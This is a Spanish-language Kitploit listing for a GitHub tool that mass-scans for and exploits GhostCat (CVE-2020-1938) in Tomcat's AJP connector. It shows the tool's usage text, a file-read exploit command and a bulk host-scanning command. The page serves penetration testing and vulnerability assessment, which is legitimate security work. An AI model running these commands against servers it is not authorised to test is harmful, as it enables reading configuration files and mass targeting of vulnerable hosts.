Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-1938-Tool — Detección masiva de la vulnerabilidad GhostCat | Kitploit
Herramientas/GitHubGitHub/just1cep4rtn3r/cve-2020-1938-tool
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubjust1cep4rtn3r/cve-2020-1938-tool

CVE-2020-1938-Tool

Detección masiva de la vulnerabilidad GhostCat

Ver Repositorio
32hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-1938-Tool

En primer lugar, agradecemos a hypn0s por la herramienta AJPY (una biblioteca de Python) para construir solicitudes del protocolo AJP. Este proyecto se basa en ella para detectar de forma masiva sitios vulnerables a GhostCat.

Modo de uso

Actualmente dispone de dos funciones

root@kitploit:~
usage: tomcat.py [-h] {read_file,scan_files} ...

positional arguments:
  {read_file,scan_files}
    read_file           Exploit CVE-2020-1938
    scan_files          scan a file list

optional arguments:
  -h, --help            show this help message and exit
  1. Lectura de archivos
root@kitploit:~
usage: tomcat.py read_file [-h] [-H HOST] [-p PORT] [--webapp WEBAPP]
                           [-f FILE]

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The host to check
  -p PORT, --port PORT  The port of AJP connector(default is 8009)
  --webapp WEBAPP       webapp
  -f FILE, --file FILE  The relative path of file to read

python3 tomcat.py read_file -H 127.0.0.1 --webapp manager -f /WEB-INF/web.xml

  1. Escanear todos los sitios en un archivo
root@kitploit:~
usage: tomcat.py scan_files [-h] [-f FILE] [-t THREADS] [-o OUT]

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  Host list(only one url in a line)
  -t THREADS, --threads THREADS
  -o OUT, --out OUT     output the vulnerable host to file

python3 tomcat.py scan_files -t 5 -f host_files.txt -o result.txt

Descargar herramienta